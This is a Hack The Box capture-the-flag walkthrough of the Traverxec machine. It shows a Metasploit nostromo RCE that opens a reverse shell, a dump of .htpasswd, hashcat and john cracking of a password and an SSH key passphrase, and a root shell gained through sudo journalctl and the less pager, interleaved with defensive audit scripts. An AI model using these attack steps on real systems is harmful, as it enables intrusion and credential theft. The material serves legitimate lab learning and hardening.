Hackthebox – Traverxec

Traverxec is an easy machine which should not be too difficult. However, after Hackthebox – Forest, I learned not to underestimate anything labelled as easy. Let’s start with a port scan.

root@kalivm:~/Traverxec# nmap -A -oN fullscan-A 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 08:10 CET
Nmap scan report for 10.10.10.165 (10.10.10.165)
Host is up (0.016s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   16.69 ms 10.10.14.1 (10.10.14.1)
2   16.64 ms 10.10.10.165 (10.10.10.165)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done 1 IP address (1 host up) scanned in 18.59 seconds

So all that is open is the SSH server and a web server. Nothing of too much interest, and after some poking around I found that most gobuster actions result in disconnects, so the web pages themselves are probably not the way to go for now.
After some research on the nostromo web server, I found this MSF exploit and was too lazy to convert it to something Python-based, even though I learned to do that during OSCP. I decided to save the .rb file in the /usr/share/metasploit-framework/modules/exploits/linux/http directory and start MSF.

root@kalivm:~/Traverxec# msfconsole 
msf5 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/linux/http/nostromo_traverxec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution
msf5 > use 0
msf5 exploit(linux/http/nostromo_traverxec) > set RHOSTS 10.10.10.165
RHOSTS => 10.10.10.165
msf5 exploit(linux/http/nostromo_traverxec) > set LHOST tun0
LHOST => 10.10.15.48
msf5 exploit(linux/http/nostromo_traverxec) > exploit

[*] Started reverse TCP handler on 10.10.15.48:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.15.48:4444 -> 10.10.10.165:39646) at 2019-11-21 09:14:54 +0100

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ 

So now I’ve got a working shell; next up is finding out how to become the user David and access user.txt. After some browsing around doing the usual privilege escalation checks, I had not yet found much of interest, but then I started taking a look at the configuration files of the Nostromo web server.

www-data@traverxec:/var/nostromo$ cat conf/nhttpd.conf
cat conf/nhttpd.conf
# MAIN [MANDATORY]

servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html

# LOGS [OPTIONAL]

logpid			logs/nhttpd.pid

# SETUID [RECOMMENDED]

user			www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons			/var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs		/home
homedirs_public		public_www

There are several interesting things in this configuration file. First, the admin name is, as expected, David. Not much of a surprise, as I had also seen this on the front page and in the /etc/passwd file. There is, however, a location given for the .htaccess and .htpasswd files, and these may contain credentials. Another interesting part is the fact that, apparently, public_www directories in home directories are also published by nostromo! If this directory exists in David’s home directory, it should be readable by my current www-data user, since that is the user nostromo runs as and it needs to read the directory in order to publish it online.
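The configuration review above is the kind of check a defender would want to automate. The following is an added example, not code from the post or from the nostromo project: it parses the key/value layout of nhttpd.conf into a dict and reports the settings that matter here, namely homedirs exposure (anything under /home/<user>/public_www that the server user can read is served) and an .htpasswd file that other local accounts can read. The sample configuration is a constructed copy of the one shown above; the `audit_nhttpd_conf` function, its severities and the file-mode check are this example's own design, and the demo writes a throwaway .htpasswd in a temporary directory rather than touching the real one.

```python
import os
import stat
import tempfile

# Constructed copy of the nhttpd.conf shown above, used as sample input.
SAMPLE_CONF = """\
# MAIN [MANDATORY]
servername\t\ttraverxec.htb
serverlisten\t\t*
serveradmin\t\tdavid@traverxec.htb
serverroot\t\t/var/nostromo
docroot\t\t\t/var/nostromo/htdocs
# SETUID [RECOMMENDED]
user\t\t\twww-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess\t\t.htaccess
htpasswd\t\t/var/nostromo/conf/.htpasswd
# HOMEDIRS [OPTIONAL]
homedirs\t\t/home
homedirs_public\t\tpublic_www
"""


def parse_nhttpd_conf(text):
    """Parse nhttpd.conf: one 'key<whitespace>value' pair per line,
    '#' comments and blank lines ignored. Alias lines ('/icons  /path') are kept too."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2:
            conf[parts[0]] = parts[1].strip()
    return conf


def audit_nhttpd_conf(conf, htpasswd_mode=None):
    """Return (severity, message) findings a defender should review.
    htpasswd_mode is the st_mode of the htpasswd file, if the caller could stat it."""
    findings = []
    if "homedirs" in conf:
        public = conf.get("homedirs_public", "")
        server_user = conf.get("user", "the server")
        findings.append(("medium",
                         f"homedirs enabled: {conf['homedirs']}/<user>/{public} is served; "
                         f"anything '{server_user}' can read there is published"))
    if "htpasswd" in conf:
        path = conf["htpasswd"]
        root = conf.get("serverroot", "")
        if root and path.startswith(root):
            findings.append(("info", f"htpasswd file {path} lives under serverroot; "
                                     "confirm it is outside docroot and not world-readable"))
        if htpasswd_mode is not None and htpasswd_mode & stat.S_IROTH:
            findings.append(("high", f"htpasswd file {path} is world-readable: "
                                     "any local account can read the password hashes"))
    if conf.get("user") in (None, "root"):
        findings.append(("high", "server does not drop privileges to an unprivileged user"))
    return findings


def demo():
    """Run the audit against the sample config plus a constructed, world-readable .htpasswd."""
    conf = parse_nhttpd_conf(SAMPLE_CONF)
    with tempfile.TemporaryDirectory() as tmp:
        # stand-in for /var/nostromo/conf/.htpasswd; the hash is a placeholder, not real
        path = os.path.join(tmp, ".htpasswd")
        with open(path, "w") as fh:
            fh.write("david:$1$PLACEHOLDER$PLACEHOLDER\n")
        os.chmod(path, 0o644)
        mode = os.stat(path).st_mode
    return audit_nhttpd_conf(conf, htpasswd_mode=mode)


if __name__ == "__main__":
    for severity, message in demo():
        print(f"[{severity}] {message}")
```

The point of the mode check is that the server has to read .htpasswd as www-data, so the file must be readable by that account; the hardening is to make it readable by that account only (owner root, group www-data, mode 0640), not by every local user.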

www-data@traverxec:/var/nostromo$ ls /home/david/public_www
index.html  protected-file-area
www-data@traverxec:/var/nostromo$ ls /home/david/public_www/protected-file-area
ls /home/david/public_www/protected-file-area
backup-ssh-identity-files.tgz

After a quick check, the directory exists, contains a subdirectory, and, even more interestingly, seems to contain a backup file with SSH identity files. This may be my way to user!

www-data@traverxec:/var/nostromo$ cat conf/.htpasswd
cat conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

This looks like a regular md5crypt ($1$) hash, which should not be too hard to crack.
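To make concrete why a $1$ hash falls in seconds, here is an added example (my own code, not from the post, and not using any external library) that implements md5crypt exactly as htpasswd and old Unix shadow files use it and verifies a candidate password against a stored `$1$salt$hash` string. The scheme is a fixed 1000 rounds of MD5 with no tunable work factor and no memory hardness, which is why a single GPU can test over a million candidates per second against it; the `verify_md5crypt` and `parse_htpasswd_line` helpers are this example's own names.

```python
import hashlib
import hmac

# md5crypt's own base64 alphabet (not the RFC 4648 one)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def md5crypt(password: bytes, salt: bytes, magic: bytes = b"$1$") -> str:
    """md5crypt ($1$): Poul-Henning Kamp's 1994 construction used by htpasswd -m
    and legacy /etc/shadow entries. Fixed 1000 MD5 rounds, nothing tunable."""
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    # feed one byte of the alternate digest per byte of password (wrapping at 16)
    for i in range(len(password)):
        ctx.update(alt[i % 16:i % 16 + 1])
    # the historical "bit walk" over the password length
    i = len(password)
    while i:
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 rounds of recombination; this is the entire cost of the scheme
    for r in range(1000):
        c = hashlib.md5()
        c.update(password if r & 1 else final)
        if r % 3:
            c.update(salt)
        if r % 7:
            c.update(password)
        c.update(final if r & 1 else password)
        final = c.digest()
    # encode the 16-byte digest in a fixed, re-ordered byte layout
    out = []
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        v = (final[a] << 16) | (final[b] << 8) | final[c]
        for _ in range(4):
            out.append(ITOA64[v & 0x3F])
            v >>= 6
    v = final[11]
    for _ in range(2):
        out.append(ITOA64[v & 0x3F])
        v >>= 6
    return (magic + salt + b"$").decode() + "".join(out)


def parse_htpasswd_line(line: str):
    """Split 'user:hash' as found in an .htpasswd file."""
    user, _, stored = line.strip().partition(":")
    return user, stored


def verify_md5crypt(stored: str, candidate: str) -> bool:
    """Constant-time check of a candidate password against a '$1$salt$hash' string."""
    if not stored.startswith("$1$"):
        raise ValueError("not an md5crypt hash")
    _, _, salt, _ = stored.split("$", 3)
    computed = md5crypt(candidate.encode(), salt.encode())
    return hmac.compare_digest(computed, stored)


if __name__ == "__main__":
    # the .htpasswd line shown in the post
    user, stored = parse_htpasswd_line("david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/")
    print(user, verify_md5crypt(stored, "Nowonly4me"))  # expected: david True
```

For a file that protects anything of value, htpasswd should be generated with bcrypt (`htpasswd -B`) where the server supports it; 1000 rounds of MD5 is a 1990s cost setting.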

$ hashcat -m 500 -w 3 -a 0 traverxec.hash ./rockyou.txt --username
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 6GB, 1518/6075 MB allocatable, 10MCU
---snip---
* Filename..: ./rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me    
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
Time.Started.....: Thu Nov 21 08:52:01 2019 (9 secs)
Time.Estimated...: Thu Nov 21 08:52:10 2019 (0 secs)
Guess.Base.......: File (./rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1271.4 kH/s (105.97ms) @ Accel:1024 Loops:500 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10813440/14344385 (75.38%)
Rejected.........: 0/10813440 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:500-1000
Candidates.#1....: XiaoNianNian -> Ms.KEL
Hardware.Mon.#1..: Temp: 45c Fan: 24% Util:100% Core:1898MHz Mem:3802MHz Bus:16

Started: Thu Nov 21 08:51:59 2019
Stopped: Thu Nov 21 08:52:11 2019

My expectations were right: in just under 10 seconds the password was cracked as Nowonly4me. However, I do not yet have the tgz file I saw, so let’s take a look at that file in a browser.

As expected, I get a login screen with HTTP Basic authentication, so it is time to try the username and password as I cracked them.

Bingo, I now have access to the archive, so I download it, extract it and try the id_rsa file I found.

root@kalivm:~/Traverxec# ssh -i home/david/.ssh/id_rsa david@10.10.10.165
Enter passphrase for key 'home/david/.ssh/id_rsa': 

So there’s a passphrase on the key file. I’ve seen this before in Hackthebox – Ghoul and several other boxes, so this should be a piece of cake.

root@kalivm:~/Traverxec# python /usr/share/john/ssh2john.py home/david/.ssh/id_rsa > david.hash
root@kalivm:~/Traverxec# john david.hash --format=SSH
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
hunter           (home/david/.ssh/id_rsa)
Proceeding with incremental:ASCII
1g 0:00:00:03  3/3 0.2673g/s 922742p/s 922742c/s 922742C/s staricho..starisse
Session completed

Done, the passphrase is hunter.
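The john output above says why this was so quick: cost 1 is 0 (MD5/AES) and cost 2 is 1 iteration, i.e. the key is in the legacy PEM format, where the passphrase goes through a single MD5 before it becomes the AES key. An added example follows, written for this post rather than taken from it or from OpenSSH: it inspects a private key file without decrypting it and reports the format, whether it is encrypted, the cipher, the KDF and the round count, which is the check to run over a backup of SSH keys before deciding how much a leaked copy would matter. The legacy PEM sample is constructed (its body is filler, not key material), and `build_openssh_v1_header` is a hypothetical helper that fabricates only the header of an openssh-key-v1 file so the parser can be exercised offline.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"

# Constructed sample: an encrypted legacy PEM key. The body is filler, not key
# material; the audit only reads the headers, like ssh2john does.
LEGACY_PEM = """\
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0A1B2C3D4E5F60718293A4B5C6D7E8F9

QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
-----END RSA PRIVATE KEY-----
"""


def _ssh_string(b: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def build_openssh_v1_header(cipher: bytes, kdf: bytes, rounds: int) -> str:
    """Hypothetical demo helper: emit a PEM-wrapped openssh-key-v1 blob whose
    header fields are real but whose key section is zero filler."""
    kdfopts = (_ssh_string(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == b"bcrypt" else b""
    blob = (OPENSSH_MAGIC + _ssh_string(cipher) + _ssh_string(kdf)
            + _ssh_string(kdfopts) + struct.pack(">I", 1) + b"\x00" * 32)
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


def audit_private_key(pem: str) -> dict:
    """Report how a private key's passphrase protection works, without decrypting it."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        body = base64.b64decode("".join(lines[1:-1]))
        if not body.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        pos = len(OPENSSH_MAGIC)
        fields = []
        for _ in range(3):  # ciphername, kdfname, kdfoptions
            (n,) = struct.unpack(">I", body[pos:pos + 4])
            fields.append(body[pos + 4:pos + 4 + n])
            pos += 4 + n
        cipher, kdf, kdfopts = fields[0].decode(), fields[1].decode(), fields[2]
        rounds = None
        if kdf == "bcrypt":
            (salt_len,) = struct.unpack(">I", kdfopts[:4])
            (rounds,) = struct.unpack(">I", kdfopts[4 + salt_len:8 + salt_len])
        encrypted = cipher != "none"
        if not encrypted:
            rating = "unprotected: no passphrase"
        elif rounds is not None and rounds < 16:
            rating = f"weak: bcrypt KDF with only {rounds} rounds"
        else:
            rating = f"ok: bcrypt KDF, {rounds} rounds"
        return {"format": "openssh-v1", "encrypted": encrypted, "cipher": cipher,
                "kdf": kdf, "rounds": rounds, "rating": rating}
    # legacy PEM: the protection is described entirely by RFC 1421-style headers
    headers = {}
    for ln in lines[1:]:
        if ":" not in ln:
            break  # header block ends at the first non-header line
        key, _, value = ln.partition(":")
        headers[key.strip()] = value.strip()
    encrypted = "ENCRYPTED" in headers.get("Proc-Type", "")
    cipher = headers["DEK-Info"].split(",")[0] if encrypted else "none"
    return {"format": "legacy-pem", "encrypted": encrypted, "cipher": cipher,
            "kdf": "md5" if encrypted else "none", "rounds": 1 if encrypted else None,
            "rating": ("weak: single MD5 of the passphrase, no work factor"
                       if encrypted else "unprotected: no passphrase")}


if __name__ == "__main__":
    print(audit_private_key(LEGACY_PEM))
    print(audit_private_key(build_openssh_v1_header(b"aes256-ctr", b"bcrypt", 16)))
```

Keys rated "weak" here can be re-wrapped in place with `ssh-keygen -p -o -a 100 -f <key>`, which switches them to the openssh-key-v1 format with a bcrypt KDF and a high round count, so the same wordlist attack runs orders of magnitude slower.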

root@kalivm:~/Traverxec# ssh -i home/david/.ssh/id_rsa david@10.10.10.165
Enter passphrase for key 'home/david/.ssh/id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Thu Nov 21 02:58:35 2019 from 10.10.15.18
david@traverxec:~$ cat user.txt
7db0b484<NOFLAG>cec20750d9782f3d

After I log in as user david with the SSH key passphrase hunter, I can access the user.txt flag.

Privilege escalation

During the next round of privilege escalation recon, I find a file in david’s home directory called server-stats.sh.

david@traverxec:~$ cat bin/server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

I take a look at this file and see that journalctl is called with sudo (root) privileges. This is interesting, as journalctl is a known GTFOBins privilege escalation path: in the script its output is piped through cat, but when run directly on a terminal journalctl hands its output to the less pager, which runs as root and can spawn a shell. So I decide to try it.
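The defender's lesson from this script is that the sudo rule, not the script, is the exposure: the pipe to cat suppresses the pager inside server-stats.sh, but the rule still lets the same command be run bare on a terminal. As an added example (my own code, not from the post), the scanner below walks a sudoers file or a shell script, pulls out commands run via sudo, and flags those that hand control to an interactive pager as root unless `--no-pager` or `SYSTEMD_PAGER=` is present. The script sample is a constructed copy of server-stats.sh; the sudoers line is hypothetical, since the post does not show the real rule.

```python
import re
import shlex

# Programs that open an interactive pager when stdout is a terminal.
PAGER_PROGRAMS = {"journalctl", "systemctl", "less", "more", "man"}

# Constructed copy of the server-stats.sh shown above.
SCRIPT = """\
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
"""

# Hypothetical sudoers line standing in for whatever rule grants that command.
SUDOERS = "david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service"


def _commands_from_sudoers(line):
    """Everything after 'host=', the optional '(runas)' and any TAG: prefixes,
    split on ',' because a rule may list several commands."""
    m = re.search(r"=\s*(?:\([^)]*\)\s*)?(?:[A-Z_]+:\s*)*(.+)$", line)
    return [c.strip() for c in m.group(1).split(",")] if m else []


def _commands_from_script(line):
    """The command line following 'sudo' in a shell script line."""
    m = re.search(r"\bsudo\s+(.+)$", line)
    return [m.group(1).strip()] if m else []


def check_pager_exposure(text, kind):
    """Scan a sudoers file (kind='sudoers') or shell script (kind='script') for
    sudo'd commands that can drop into a root pager. Returns (lineno, severity, message)."""
    extract = _commands_from_sudoers if kind == "sudoers" else _commands_from_script
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for cmd in extract(line):
            stages = [s.strip() for s in cmd.split("|")]
            argv = shlex.split(stages[0])
            if not argv:
                continue
            prog = argv[0].rsplit("/", 1)[-1]
            if prog not in PAGER_PROGRAMS:
                continue
            if "--no-pager" in argv or "SYSTEMD_PAGER=" in line:
                continue  # pager explicitly disabled
            if len(stages) > 1:
                findings.append((lineno, "info",
                                 f"{prog} is piped here, so no pager in this script; "
                                 f"check that the sudo rule does not allow the bare command"))
            else:
                findings.append((lineno, "high",
                                 f"'sudo {prog}' without --no-pager: an interactive "
                                 f"pager would run as root"))
    return findings


if __name__ == "__main__":
    for source, kind in ((SUDOERS, "sudoers"), (SCRIPT, "script")):
        for lineno, severity, message in check_pager_exposure(source, kind):
            print(f"{kind}:{lineno} [{severity}] {message}")
```

The fix is on the rule side: grant `/usr/bin/journalctl --no-pager -n5 -unostromo.service` (and update the script to match) so that the exact argument list sudo permits can never attach a pager.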

david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2019-11-21 02:10:13 EST, end at Thu 2019-11-21 03:00:33 EST. --
Nov 21 02:58:41 traverxec sudo[4155]: www-data : user NOT in sudoers ; TTY=pts/3 ; PWD=/var/nostromo/conf ; USER=root ; COMMAND=dav
Nov 21 03:00:04 traverxec su[4339]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/3 ruser=www-data rhos
Nov 21 03:00:06 traverxec su[4339]: FAILED SU (to david) www-data on pts/3
Nov 21 03:00:21 traverxec su[4373]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty=pts/3 ruser=www-data rhos
Nov 21 03:00:23 traverxec su[4373]: FAILED SU (to root) www-data on pts/3
!/bin/sh
# cat /root/root.txt
9aa36a6d<NOFLAG>d320a478f6e0d906

And there we have the root flag!
